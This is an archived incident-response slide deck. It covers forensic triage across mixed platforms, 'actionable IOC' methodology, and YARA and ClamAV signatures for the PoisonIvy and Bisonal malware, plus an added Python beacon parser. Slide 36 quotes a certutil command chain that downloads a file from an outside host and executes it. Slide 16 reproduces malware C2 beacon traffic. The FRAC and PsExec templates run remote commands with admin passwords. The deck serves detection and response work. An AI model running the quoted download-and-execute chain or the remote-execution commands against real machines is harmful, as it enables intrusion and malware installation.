{
	"id": "e69cd851-d5fa-4e2d-867e-2df227f4af64",
	"created_at": "2026-04-06T01:31:49.695277Z",
	"updated_at": "2026-04-10T13:12:36.106594Z",
	"deleted_at": null,
	"sha1_hash": "84419dc1e56b82b8ff79db2f7519b2b51785bab3",
	"title": "BSides IR in Heterogeneous Environment",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 78485,
	"plain_text": "BSides IR in Heterogeneous Environment
Archived: 2026-04-06 01:26:06 UTC
1.
2.
The mass-triage problem in 2018
• The investigation process (triage) in any IT incident is the key to solving the case and to cleaning all the affected systems.
• But in heterogeneous environments, where Windows, Linux, macOS and Unix systems are all potentially affected by the attacker, the investigation process is slowed by a number of technical complexities.
• First problem: a common platform and procedure to adopt for the triage, as many technologies are capable of covering only a portion of the environment.
• Second problem: what to look for. The triage aims to identify malicious artifacts, and the usual technologies do not provide the flexibility and agility needed to shape the triage process.
• Third problem: the capability to search the heterogeneous environment using custom IOCs.
• Fourth problem: the possibility of pinpointing known badness, which allows for easier mitigation.
• In our approach, IOCs play an important role both in the investigation process and in defining the best way to approach the triage. We were looking for a \"rule them all\" solution that overcomes the traditional limitations of the most common commercial solutions.
3.
Traditional IOC application
• The traditional IR approach:
  - Context, with regard to IOCs, typically does not exist.
  - Application of IOCs to the environment is rule-based.
  - Customization of IOCs is not an option in some commercial products.
  - Rule-based detection will miss changes made to the actor's tools.
4.
Our idea
• The production of code leaves traces in any binary.
• The binary can contain debugging symbols, which give you a lot of information.
• Often the attacker's tools include the use of specific libraries or functions.
• A lot of fingerprinting can be done on software, and this is very useful for IR analyses.
• The combined information of both can help solve the attribution problem.
• Helps with the assessment of risks.
• Identifies end goals for known actors.
• Aids the creation of IOCs that are \"actionable\" and not \"disposable\".
5.
RIFT (Retrieve Interesting Files Tool)
• Retrieves files/directories based on a regex list.
• Uses The Sleuth Kit to retrieve the files forensically.
• Outputs the files into a directory named after the machine.
• Retrieved files are saved to a remote share or USB drive.
• Recreates the directory structure of where each file was found.
• To run: rift --verbose --savedrive [SAVEDRIVE]
• Download: https://github.com/chaoticmachinery/frac_rift
6.
7.
FRAC (Forensic Response ACquisition)
• Uses RIFT to forensically retrieve files/directories across the network.
• Recommended: use PAExec or SSH/sshpass to connect to the remote machines.
• Requires local admin rights and a remote share (SMB or NFS, depending on the OS).
• Supports a single IP, CIDR notation and IP ranges, for example:
  - 172.16.10.12
  - 172.16.10.1/24
  - 172.16.10.1-172.16.10.230
• Can be used to execute any command on the remote machines.
• To run: frac_v0.05 --iplist iplist.txt --cmd cmd.txt --verbose
Examples of cmd.txt (the bracketed names are placeholders FRAC fills in):
Windows, via PAExec:
  paexec.exe \\\\[IP] -n 4 -u [ADMINID] -p [ADMINPASS] -s cmd /C \"net use [SHAREDRV] /delete /yes & net use [SHAREDRV] [SHARE] /user:[SHAREUSERID] [SHAREPASSWD] && cd /d [SAVEDRIVE] && rift.exe --verbose --savedrive [SAVEDRIVE] && net use [SHAREDRV] /delete /yes\"
Linux/Unix, via sshpass:
  sshpass -p [ADMINPASS] ssh [IP] \"mkdir [SHAREDRV]; mount [MNTOPTS] [SRCBOX]:[SRCMNT] [SHAREDRV]; cd [SHAREDRV]/frac_v0.05 && ./rift --verbose --savedrive [SAVEDRIVE]; cd / && umount [SHAREDRV] && rmdir [SHAREDRV]\"
Caveat: both templates pass the admin password on the command line (-p), where it is visible to anyone who can list processes on the machine running FRAC and may land in shell history; prefer SSH keys or a credential prompt where the tooling allows it.
8.
FRAC (Forensic Response Acquisition): The Output
• FRAC/RIFT creates directories named with the hostname of the machine and the acquisition timestamp; inside, the directory tree of the source is recreated next to the file lists:
drwxr-xr-x   7 root root      4096 Apr 11 19:39 machinea_04112018_19-18-58
drwxr-xr-x   9 root root      4096 Apr 11 20:11 machineb_04112018_15-19-02
drwxr-xr-x 135 root root     20480 Apr 11 19:37 etc
-rw-r--r--   1 root root    675539 Apr 11 19:40 getfiles.txt
drwxr-xr-x   3 root root      4096 Apr 11 19:37 home
drwxr-xr-x   3 root root      4096 Apr 11 19:37 opt
drwxr-xr-x   5 root root      4096 Apr 11 19:21 root
-rw-r--r--   1 root root 230661477 Apr 11 19:43 machineb_04112018_15-19-28_fls.out
drwxr-xr-x   5 root root      4096 Apr 11 19:38 usr
drwxr-xr-x   5 root root      4096 Apr 11 19:40 var
• getfiles.txt contains the mactime information for all of the files retrieved, as well as the inode.
• *_fls.out contains the output (mactime body format) of The Sleuth Kit fls command.
• All of the directory structure is recreated and the files are forensically copied to where they existed on the drive.
https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment
Page 1 of 6
9.
Actionable IOCs (AIOCs)
• The concept of \"actionable\" IOCs has been derived and refined from a collective set of Incident Response investigations, and can become a valid support to our investigative process if organized in a scientifically sound approach.
• Utilizes procedures, analysis and evidence for a methodical approach.
• Based on positive matches, it can help identify the attacker.
• It allows the creation of a structured knowledge base of attackers.
• The knowledge base allows the creation of attacker profiles.
10.
11.
Example: PoisonIvy
• PoisonIvy, a Remote Access Tool/Trojan (RAT) often used in targeted attacks, had been widely seen until around 2013.
• Since then, the number of cases using PoisonIvy decreased, and no special variant with expanded features was seen in the wild.
• However, recently we identified PoisonIvy with expanded features in its communication function, capable of bypassing HTTP/HTTPS proxies in APT and cybercriminal attacks thanks to modifications in the malware code.
Latest PoisonIvy variants are different.
12.
YARA RULES: PoisonIvy typical IOCs
rule poisonivy_1 : rat
{
    meta:
        description = \"Poison Ivy\"
        author = \"Jean-Philippe Teissier / @Jipe_\"
        date = \"2013-02-01\"
        filetype = \"memory\"
        version = \"1.0\"
        ref1 = \"https://code.google.com/p/volatility/source/browse/trunk/contrib/plugins/malware/poisonivy.py\"
    strings:
        // \"StubPath\" ?? \"SOFTWARE\\\\Classes\\\\http\\\\shell\\\\open\\\\command\" [22] \"Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\\"
        $a = { 53 74 75 62 50 61 74 68 ?? 53 4F 46 54 57 41 52 45 5C 43 6C 61 73 73 65 73 5C 68 74 74 70 5C 73 68 65 6C 6C 5C 6F 70 65 6E 5C 63 6F 6D 6D 61 6E 64 [22] 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 41 63 74 69 76 65 20 53 65 74 75 70 5C 49 6E 73 74 61 6C 6C 65 64 20 43 6F 6D 70 6F 6E 65 6E 74 73 5C }
    condition:
        $a
}

rule PoisonIvy_2
{
    meta:
        author = \" Kevin Breen <kevin@techanarchy.net>\"
        date = \"2014/04\"
        ref = \"http://malwareconfig.com/stats/PoisonIvy\"
        maltype = \"Remote Access Trojan\"
        filetype = \"exe\"
    strings:
        $stub = {04 08 00 53 74 75 62 50 61 74 68 18 04}
        $string1 = \"CONNECT %s:%i HTTP/1.0\"
        $string2 = \"ws2_32\"
        $string3 = \"cks=u\"
        $string4 = \"thj@h\"
        $string5 = \"advpack\"
    condition:
        $stub at 0x1620 and all of ($string*) or (all of them)
}

rule PoisonIvy_Generic_3
{
    meta:
        description = \"PoisonIvy RAT Generic Rule\"
        author = \"Florian Roth\"
        date = \"2015-05-14\"
        hash = \"e1cbdf740785f97c93a0a7a01ef2614be792afcd\"
    strings:
        $k1 = \"Tiger324{\" fullword ascii
        $s2 = \"WININET.dll\" fullword ascii
        $s3 = \"mscoree.dll\" fullword wide
        $s4 = \"WS2_32.dll\" fullword
        $s5 = \"Explorer.exe\" fullword wide
        $s6 = \"USER32.DLL\"
        $s7 = \"CONOUT$\"
        $s8 = \"login.asp\"
        $h1 = \"HTTP/1.0\"
        $h2 = \"POST\"
        $h3 = \"login.asp\"
        $h4 = \"check.asp\"
        $h5 = \"result.asp\"
        $h6 = \"upload.asp\"
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and ( $k1 or all of ($s*) or all of ($h*) )
}

rule PoisonIvy_Sample_APT
{
    meta:
        description = \"Detects a PoisonIvy APT malware group\"
        author = \"Florian Roth\"
        reference = \"VT Analysis\"
        date = \"2015-06-03\"
        hash = \"b874b76ff7b281c8baa80e4a71fc9be514093c70\"
    strings:
        $s0 = \"pidll.dll\" fullword ascii
        $s1 = \"sens32.dll\" fullword wide
        $s3 = \"FileDescription\" fullword wide
        $s4 = \"OriginalFilename\" fullword
        $s5 = \"ZwSetInformationProcess\" fullword ascii
        $s9 = \"Microsoft Media Device Service Provider\" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 47KB and all of them
}
13.
YARA RULES: PoisonIvy actionable IOC (YARA rule)
rule PoisonIvy
{
    strings:
        $s1 = \"%supdate%4d%02d%02d%02d%02d%02d.tmp\" wide ascii
        $s2 = \"cks=u\" wide ascii
        $s3 = \"CONNECT %s:%i HTTP//1.0\" wide ascii
        $s4 = \"vry7fo/URLDownez{\" wide ascii
        // two literal backslashes, as in the bytes 36 5c 5c 75 of the ClamAV signature for the same sample (slide 34)
        $s5 = \"6\\\\\\\\u%u.193.%d\" wide ascii
        $s6 = \"/c del %s > nul\" wide ascii
        $s7 = \"%u.193.%d.%d\" wide ascii
        $s8 = \"GET %s HTTP/1.1\" wide ascii
    condition:
        // the three string groups are parenthesised as a whole so that the PE checks below apply to every group
        // (in YARA 'and' binds tighter than 'or'; without the outer parentheses they would constrain only $s6..$s8)
        ( ($s1 and $s2 and $s3) or ($s4 and $s5) or ($s6 and $s7 and $s8) ) and
        // MZ signature at offset 0 and ...
        uint16(0) == 0x5A4D and
        // ... PE signature at offset stored in MZ header at 0x3C
        uint32(uint32(0x3C)) == 0x00004550
}
• The first three strings ($s1, $s2, $s3) identify the generic PoisonIvy variants, including the latest ones.
• $s4 and $s5 match an old (2011) version of PoisonIvy packed with UPX.
• For the same 2011 sample, $s6, $s7 and $s8 match the unpacked (decompressed) version.
14.
AIOC formalization process
[Diagram. Labels: Atomic IOCs; High-order YARA rules for files and packets; Actor tags and attack descriptions; Actor tools; High-order ClamAV signatures; High-order log and system artifacts; System and network visibility; Alternative system visibility; Log and artifact visibility; Classification and attribution; VirusTotal and other repository searches; Evolutive and comparative analysis; Formalization]
15.
Trojan.Bisonal
• Bisonal is another example. It is a backdoor.
• The malware can be split into two components: the main module and the communication module.
• The main module is responsible for providing the framework to execute the various components within the malware.
• The communication module is responsible for sending information to the server, receiving new commands from it and downloading new executables.
• If a new executable is downloaded successfully, it notifies the main module to execute it.
• The malware is capable of:
  - Listing and controlling processes
  - Creating and deleting files
  - Creating a remote shell
  - Downloading and executing files
• Bisonal is an APT tool.
16.
Trojan.Bisonal traffic
• A custom \"flag\" and the C2 domain are used to track the victim.
GET /j/news.asp?id=* HTTP/1.1
User-Agent: flag:khi host:Business IP:10.0.0.51 OS:XPSP3 vm:.. proxy:..
Host: online.cleansite.us
Cache-Control: no-cache
----------------
GET /a.asp?id=* HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04.506.648; .NET CLR 3.5.21002)
Host: khi.acmetoy.com
Connection: Keep-Alive
----------------
GET /rc/news1.asp?id=flag:831nec%20host:Remote%20PC%20IP:169.254.100.211%20OS:XPSP3%20vm:..%20proxy:.. HTTP/1.1
User-Agent: flag:831nec host:Remote PC IP:169.254.100.211 OS:XPSP3 vm:?? proxy:??
Host: online.4pu.com
----------------
GET /a.asp?id=* HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04.506.648; .NET CLR 3.5.21002)
Host: necnec.dns04.com
Connection: Keep-Alive
17.
Trojan.Bisonal: resulting AIOC description
• Type of malware: modular Trojan (single stage), mainly used for data stealing
• Capabilities: beaconing, listing and controlling processes, creating and deleting files, creating remote shells, downloading and executing files
• Dissemination strategy: via dropper or email attachment
• Architecture: client/server using public C2s
• Type of communication: HTTP (in general over TCP/80 and TCP/443, but the port can be customized)
• Related adversary: HeartBeat APT group (Chinese)
• Earliest adversary detection: November 2009 (South Korea, Trend Micro)
• Area of operation: currently limited to Asia (including Russia)
• Recorded targets: Mitsubishi Heavy Industries, NEC Corp, Nippon Steel Corp, IHI Corp, several ministries in Japan and South Korea
• Types of AIOCs developed: YARA rules for files, YARA rules for PCAPs, ClamAV rules, Snort rule, registry and logs
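Worked example, added here and not part of the original slides: a small Python parser that applies the traffic AIOC above to raw HTTP requests. It pulls the flag/host/IP/OS victim descriptor out of the User-Agent, or out of the URL-encoded id= query parameter when the beacon carries it there, and otherwise flags .asp?id= polling toward the C2 hosts captured on the slide. The sample requests are constructed from the slide's captures; the function and variable names are the example's own.

```python
# Added example (not from the slides): extract the Bisonal victim tag from HTTP requests.
# The backdoor beacons with a User-Agent (or an id= query parameter) of the form
#   flag:<tag> host:<hostname> IP:<ip> OS:<os> vm:<..> proxy:<..>
# and, with a generic MSIE User-Agent, polls /a.asp?id=... on one of its C2 hosts.
import re
from urllib.parse import urlsplit, parse_qs, unquote

CRLF = chr(13) + chr(10)

# C2 host names taken from the captures on the slide (atomic IOCs).
BISONAL_C2_HOSTS = {'online.cleansite.us', 'khi.acmetoy.com', 'online.4pu.com', 'necnec.dns04.com'}

# Victim descriptor carried in the beacon; [^ ]+ is a run of non-space characters.
# Case-insensitive because the flags on slide 20 appear as both flag: and Flag:.
VICTIM_RE = re.compile('flag:([^ ]+) host:(.*?) IP:([^ ]+) OS:([^ ]+) vm:([^ ]+) proxy:([^ ]+)', re.IGNORECASE)

def parse_request(raw):
    # Split a raw HTTP/1.x request into (method, target, headers); the body is ignored.
    lines = raw.split(CRLF)
    method, target = lines[0].split(' ')[0:2]
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return method, target, headers

def classify_bisonal(raw):
    # Returns None for non-matching traffic, otherwise a dict describing the hit.
    method, target, headers = parse_request(raw)
    host = headers.get('host', '').lower()
    ua = headers.get('user-agent', '')
    # Strongest signal: the victim descriptor, in the User-Agent or URL-encoded in id=.
    candidates = [ua]
    query = parse_qs(urlsplit(target).query)
    candidates.extend(unquote(v) for v in query.get('id', []))
    for text in candidates:
        m = VICTIM_RE.search(text)
        if m:
            return {'kind': 'victim_beacon', 'flag': m.group(1), 'victim_host': m.group(2),
                    'victim_ip': m.group(3), 'os': m.group(4), 'c2': host}
    # Weaker signal: .asp?id= polling toward a known C2 host.
    if host in BISONAL_C2_HOSTS and '.asp?id=' in target:
        return {'kind': 'c2_poll', 'flag': None, 'c2': host, 'target': target}
    return None

# Constructed sample traffic, modelled on the captures shown on the slide.
SAMPLE_REQUESTS = [
    CRLF.join(['GET /j/news.asp?id=* HTTP/1.1',
               'User-Agent: flag:khi host:Business IP:10.0.0.51 OS:XPSP3 vm:.. proxy:..',
               'Host: online.cleansite.us', 'Cache-Control: no-cache', '', '']),
    CRLF.join(['GET /rc/news1.asp?id=flag:831nec%20host:Remote%20PC%20IP:169.254.100.211%20OS:XPSP3%20vm:..%20proxy:.. HTTP/1.1',
               'User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
               'Host: online.4pu.com', '', '']),
    CRLF.join(['GET /a.asp?id=* HTTP/1.1',
               'User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)',
               'Host: necnec.dns04.com', 'Connection: Keep-Alive', '', '']),
    CRLF.join(['GET /index.html HTTP/1.1',
               'User-Agent: Mozilla/5.0',
               'Host: www.example.com', '', '']),
]

def scan(requests=SAMPLE_REQUESTS):
    # One classification per request, in input order (None where nothing matched).
    return [classify_bisonal(r) for r in requests]

if __name__ == '__main__':
    for hit in scan():
        print(hit)
```

The flag returned by the victim_beacon hits is the per-campaign tag that the next slides turn into campaign-specific rules, so it is the value to key an attacker profile on; the c2_poll hit on its own is only as strong as the domain list behind it.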
18.
Bisonal behavior: registry key IOCs
Sample 918a78b49397b17da48f37206fa7801b11d410ea6faa755d0aa27872c7e84c74 sets registry values:
• key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, value: dfea, data: C:\\Windows\\tasks\\dfea.exe
• key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap, value: UNCAsIntranet, data: 0
• key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap, value: AutoDetect, data: 1
Sample e8ff9de367c771fd9a5ae2df91b62fe57a64f528a7a80dbd9e307a7ae3e6af80 sets registry values:
• key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap, value: UNCAsIntranet, data: 0
• key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap, value: AutoDetect, data: 1
Created-file IOCs:
• Sample 918a78b49397b17da48f37206fa7801b11d410ea6faa755d0aa27872c7e84c74 creates C:\\Windows\\Tasks\\dfea.exe
• Sample e8ff9de367c771fd9a5ae2df91b62fe57a64f528a7a80dbd9e307a7ae3e6af80 creates C:\\Users\\Admin\\AppData\\Local\\Temp\\chrome.exe and C:\\Windows\\Tasks\\taskeng.exe
19.
YARA RULES: Trojan.Bisonal family
rule Trojan_Bisonal
{
    // a YARA rule identifier cannot contain a dot, hence Trojan_Bisonal rather than Trojan.Bisonal
    strings:
        $s1 = \"wkko%00hhh1y~|t}ppt1|pr0Josp~{Yvsz0y~rz0g0p/1~lo\" wide ascii
        $s2 = \"defa\" wide ascii
        $s3 = \"love a meng\" wide ascii
        $s4 = \"HE@L-PShellE\" wide ascii
        $s5 = \"xecut\"
        $s6 = \"wkko%00yjq{1|r|1pm1tm0Josp~{Yvsz0y~rz0g0p/1~lo\" wide ascii
        $s7 = \"http://%s/%s.asp?id=%s%s%s\"
        $s8 = \"http://%s/a.asp?id=%s%s\"
        $s9 = \"c:\\\\a\\\\1.txt\"
    condition:
        // the four string groups are alternatives, parenthesised as a whole so that the PE checks
        // apply to every group (this mirrors the ClamAV logical signature (4&5)|(6&7&8) on slide 35)
        ( ($s1 and $s2) or ($s2 and $s3) or ($s4 and $s5) or ($s6 and $s7 and $s8 and $s9) ) and
        // MZ signature at offset 0 and ...
        uint16(0) == 0x5A4D and
        // ... PE signature at offset stored in MZ header at 0x3C
        uint32(uint32(0x3C)) == 0x00004550
}
• The first two strings ($s1, $s2) are common to other Bisonal samples, but not to all of them.
• The latest samples contain different strings, except for $s6, which is very similar to $s1.
• $s4 and $s5 match a Bisonal sample that uses a common obfuscation technique (a word split across several lines).
• Beyond the common string \"defa\", the Bisonal samples present different strings.
20.
YARA RULES toward AIOCs: Trojan.Bisonal family
Flags observed in the beacons, with the victims they appear to identify:
• Flag:727x
• Flag:1223
• Flag:8080
• Flag:84d
• Flag:d2
• Flag:dick
• Flag:ihi (IHI Corp)
• Flag:m615
• Flag:MARK 1
• Flag:nec01 (NEC Corp)
• Flag:nsc516 (Nippon Steel Corp)
• Flag:qqq
• Flag:toray
• Flag:410maff (Ministry of Agriculture, Forestry and Fisheries)
• Flag:712mhi (Mitsubishi Heavy Industries)
• ...
Per-campaign rules (each one ties a flag to a campaign):
rule campaignA { strings: $s00 = \"Flag:8080\" ascii wide nocase condition: all of them and uint16(0) == 0xC3D4 }
rule campaignB { strings: $s00 = \"Flag:84d\" ascii wide nocase condition: all of them and uint16(0) == 0xC3D4 }
rule campaignC { strings: $s00 = \"flag:boat\" ascii wide nocase condition: all of them and uint16(0) == 0xC3D4 }
rule campaignD { strings: $s00 = \"Flag:d2\" ascii wide nocase condition: all of them and uint16(0) == 0xC3D4 }
rule campaignE { strings: $s00 = \"Flag:dick\" ascii wide nocase condition: all of them and uint16(0) == 0xC3D4 }
rule campaignF { strings: $s00 = \"flag:ihi\" ascii wide nocase condition: all of them and uint16(0) == 0xC3D4 }
rule campaignW { strings: $s00 = \"Flag:qqq\" ascii wide nocase condition: all of them and uint16(0) == 0xC3D4 }
• To develop AIOCs from atomic indicators we need to incorporate \"actionable\" elements that link the malware to a specific actor and campaign.
• These YARA rules can be applied to PCAPs: uint16(0) == 0xC3D4 is the little-endian read of the classic pcap magic (bytes d4 c3 b2 a1), so the rules fire only on pcap files, not on pcapng captures (magic 0a 0d 0d 0a) or on the live stream.
21.
22.
ClamAV: Intro
• ClamAV is an open source and free anti-virus program.
• ClamAV runs on Windows (ClamWin), Linux, BSD, Solaris and macOS. It is mainly designed to scan email attachments, but it can be used as a regular anti-virus.
• Features: can search archives, can search multiple file types, multithreaded.
• ClamAV includes:
  - clamscan: command-line virus scanner
  - clamdscan/clamd: client/server virus scanner
  - freshclam: tool to update the virus definition database
23.
YARA rules, AIOCs and ClamAV
• YARA is the Swiss army knife for any low-cost triage and can be applied to many endpoint forensic platforms.
• Values that work across multiple platforms: text strings, and hex values that are present in multiple versions of the binary.
• ClamAV provides a combination of both worlds.
• By empowering ClamAV with YARA rules, we are able to run massive triage on almost all types of system using the AIOCs we have developed.
24.
Using ClamAV to scan for badness
clamscan --infected --recursive --allmatch --archive-verbose --database ./{yara sigs}.yara {starting directory} | tee clamav_{date}_yara
clamscan --infected --recursive --allmatch --archive-verbose --database ./{clamav sigs}.ldb {starting directory} | tee clamav_{date}_sigs
25.
Using ClamAV: results with custom ClamAV rules
• Multiple hits on the same file help to verify the results:
/kswapd0: cpuminer_v2.3.3_64bit.UNOFFICIAL FOUND
/kswapd0: cpuminer_generic.UNOFFICIAL FOUND
/kswapd0: cpuminer_v2.3.3_102917_64bit.UNOFFICIAL FOUND
/kswapd0: cpuminer_v2.3.3_102917_32bit.UNOFFICIAL FOUND
/kswapd0!(0): cpuminer_v2.3.3_102917_32bit.UNOFFICIAL FOUND
/minerd: minerd_cpuminer_v2.3.3_64bit.UNOFFICIAL FOUND
/minerd: cpuminer_generic.UNOFFICIAL FOUND
/minerd!(0): cpuminer_generic.UNOFFICIAL FOUND
/yam: yam_cpuminer_64bit.UNOFFICIAL FOUND
/yam!(0): yam_cpuminer_64bit.UNOFFICIAL FOUND
/gcc: XMRig_v2.3.1.UNOFFICIAL FOUND
/gcc!(0): XMRig_v2.3.1.UNOFFICIAL FOUND
26.
Using ClamAV: results with custom YARA rules
• Multiple hits on the same file help to verify the results:
config.json: YARA.stratum.UNOFFICIAL FOUND
config.json: YARA.monero.UNOFFICIAL FOUND
config.json: YARA.monerohashcom.UNOFFICIAL FOUND
config.json!(0): YARA.monerohashcom.UNOFFICIAL FOUND
outfile: YARA.stratum.UNOFFICIAL FOUND
outfile: YARA.cpuminer.UNOFFICIAL FOUND
outfile!(0): YARA.cpuminer.UNOFFICIAL FOUND
kswapd0: YARA.stratum.UNOFFICIAL FOUND
kswapd0: YARA.cpuminer.UNOFFICIAL FOUND
kswapd0!(0): YARA.cpuminer.UNOFFICIAL FOUND
27.
Sigtool: ClamAV command line
Sigtool (signature and database management tool) can create:
• a signature using the hash of a PE section of an executable
• a signature using the full MD5 hash of a file
• a signature using a hex fragment of a file
28.
Sigtool: commands explained
C:\\Documents and Settings\\user\\Desktop>sigtool --md5 malware.exe >> sigFile.hdb
C:\\Documents and Settings\\user\\Desktop>type sigFile.hdb
B4619d8058362b38d20480c14d30c209:40500:malware.exe
C:\\Documents and Settings\\user\\Desktop>sigtool --mdb malware.exe.text.dat >> sigFile.mdb
• To create a unique signature for an executable file, use the --md5 option of sigtool and save the output into a file with the .hdb extension (the line has the form MD5:FileSize:MalwareName).
• To create a signature that matches a particular PE section (typically the sections are labelled .text, .rdata, .data, .idata, etc.), use the --mdb option of sigtool and save the output into a .mdb file. The easiest way to generate MD5-based section signatures is to extract the target PE sections into separate files.
29.
Sigtool: commands explained
C:\\Documents and Settings\\user\\Desktop>echo I am malware | sigtool --hex-dump
4920616d2061206d616c77617265200d0a
C:\\Documents and Settings\\user\\Desktop>echo testSig:0:*:4920616d2061206d616c77617265200d0a >> sigFile.ndb
• The last method is to use body-based signatures in hexadecimal format. It relies on strings extracted from the body of the file.
• In the example above we create a hex dump of the string \"I am malware\". Note that cmd.exe's echo also emits the trailing space and the CRLF (the final 20 0d 0a), which therefore become part of the signature.
• Next we save the signature in the \"extended signature\" format MalwareName:TargetType:Offset:HexSignature and redirect the output to a .ndb file.
30.
Generating ClamAV signatures with IDA and CASC
• ClamAV Signature Creator (CASC). How to use it: https://github.com/Cisco-Talos/CASC/wiki
• 1. Open the binary in IDA and select the Strings window. 2. Right-click and select \"add string\". 3. Select the text.
31.
Generating ClamAV signatures with IDA and CASC
• 4. Select the signature(s) and hit the \"Create ClamAV Signature\" button in the ClamAV Signature Creator view.
• 5. In the popup, find the signature and save it to a file. Note: make sure the extension is .ldb.
32.
Remote ClamAV scan with PsExec
• PsExec can execute remote commands and so start the scan on every computer of a network.
• To use PsExec, the user must have rights to access the filesystem of the target computer.
> psexec \\\\192.168.81.128 -u administrator -p p4ssw0rd1! \"C:\\Program Files (x86)\\ClamAV\\clamscan\" -r -d C:\\bioazih.ndb C:\\
> psexec \\\\DESTINATIONIP -u USER -p PASSWORD \"REMOTE_PATH_TO_CLAMSCAN\" -r -d LOCAL_PATH_TO_CLAMAV_DATABASE_FILE REMOTE_PATH_TO_SCAN
• Caveat: PsExec runs clamscan on the remote host, so the -d path is resolved there; the database file must already exist on the target (or on a share the target can reach).
[Diagram: PsExec machine with ClamAV DB scanning Scanned Host 1, Scanned Host 2, Scanned Host 3]
33.
Remote ClamAV scan with FRAC
• FRAC can be used to scan the network.
• It tracks the IP addresses that could not be connected to, so that they can be fed back to FRAC later for scanning.
• Remember to create a share with the ClamAV databases.
• Might be able to scan more than 25 boxes at a time.
• Do sensitive boxes by hand rather than with FRAC.
[Diagram: FRAC machine with ClamAV DB scanning Scanned Host 1, Scanned Host 2, Scanned Host 3]
./frac_v0.05.pl --iplist iplist.txt --cmd cmd.txt --verbose
34.
ClamAV PoisonIvy variant signatures
PoisonIvy2015:0:*:257375706461746525346425303264253032642530326425303264253032642e746d70*434f4e4e4543542025733a256920485
PoisonIVY2011:0:*:202f632064656c202573203e206e756c*25752e3139332e25642e2564*47455420257320485454502f312e31*757564646f736
PoisonIVY2011UPX:0:*:76727937666f2f55524c446f776e657a7b*365c5c7525752e3139332e2564
• The first rule contains two non-consecutive strings separated by the * wildcard. The first string, decoded from hex, is \"%supdate%4d%02d%02d%02d%02d%02d.tmp\"; the second is \"CONNECT %s:%i HTTP//1.0\" (its hex is cut off on the slide after \"CONNECT %s:%i H\").
• The second rule takes a PoisonIvy sample dated 2011 and uses several strings: \" /c del %s > nul\", \"%u.193.%d.%d\", \"GET %s HTTP/1.1\" and a last fragment that is cut off on the slide (the original commentary gives it as \"uuddosbea\").
• The third rule is the same sample without the UPX packer. The first of its two strings is \"vry7fo/URLDownez{\", the second is \"6\\\\u%u.193.%d\" (bytes 36 5c 5c 75 ..., i.e. two literal backslashes).
35.
ClamAV Bisonal logic signature
BISONAL;Target:1;(0&1&2)|(0&2&3)|(4&5)|(6&7&8);534f4654574152455c4d6963726f736f66745c57696e646f77735c43757272656e7456657273696f6e5c52756e;776b6b6f25303068686831797e7c747d707074317c7072304a6f73707e7b5976737a30797e727a306730702f317e6c6f;633a5c77696e646f77735c7461736b735c646566612e657865;6c6f76652061206d656e67;4845404c2d505368656c6c45;7865637574;776b6b6f253030796a717b317c727c31706d31746d304a6f73707e7b5976737a30797e727a306730702f317e6c6f;687474703a2f2f25732f25732e6173703f69643d257325732573;633a5c615c322e747874
• This is a ClamAV body-based signature, slightly different from the previous one: it has to be put inside a .ldb file, and it is possible to use logical operators inside the rule. (Two of the hex subsignatures are cut off on the slide; the line above carries the full values from the decode table that follows.)
• Logical operators in action within the BISONAL signature. The numbers are placeholders for the hex subsignatures. Match if found: (strings 0, 1 and 2) OR (strings 0, 2 and 3) OR (strings 4 and 5) OR (strings 6, 7 and 8).
0: 534f4654574152455c4d6963726f736f66745c57696e646f77735c43757272656e7456657273696f6e5c52756e = SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
1: 776b6b6f25303068686831797e7c747d707074317c7072304a6f73707e7b5976737a30797e727a306730702f317e6c6f = wkko%00hhh1y~|t}ppt1|pr0Josp~{Yvsz0y~rz0g0p/1~lo
2: 633a5c77696e646f77735c7461736b735c646566612e657865 = c:\\windows\\tasks\\defa.exe
3: 6c6f76652061206d656e67 = love a meng
4: 4845404c2d505368656c6c45 = HE@L-PShellE
5: 7865637574 = xecut
6: 776b6b6f253030796a717b317c727c31706d31746d304a6f73707e7b5976737a30797e727a306730702f317e6c6f = wkko%00yjq{1|r|1pm1tm0Josp~{Yvsz0y~rz0g0p/1~lo
7: 687474703a2f2f25732f25732e6173703f69643d257325732573 = http://%s/%s.asp?id=%s%s%s
8: 633a5c615c322e747874 = c:\\a\\2.txt
36.
ClamAV and forensics
• ClamAV can help with forensic investigations: it can detect badness in log files.
• Example: scanning the web server logs produces a hit in section C (the request body) of the ModSecurity audit log:
/var/log/httpd/modsec_audit.log: Win.Downloader.CertutilURLCache-6335697-0 FOUND
• The matching content is a certutil download-and-decode chain:
certutil -urlcache -split -f http://xx.xx.xx.xx/update.b64 update.b64
certutil -decode update.b64 update.exe
update.exe
37.
Where are we heading
• Actionable IOCs are an answer to the need for solid indicators to support the investigation, attribution and triage of incidents generated by malicious actors.
• The adoption of this methodology can positively impact investigation and triage, and it also improves knowledge of the tools and strategies adopted by the adversaries.
• The formalization process behind it can facilitate the exchange of information and indicators without the risk of unintentional leakage of sensitive information and, in short, strengthen the proactive and reactive capabilities of any organization.
38.
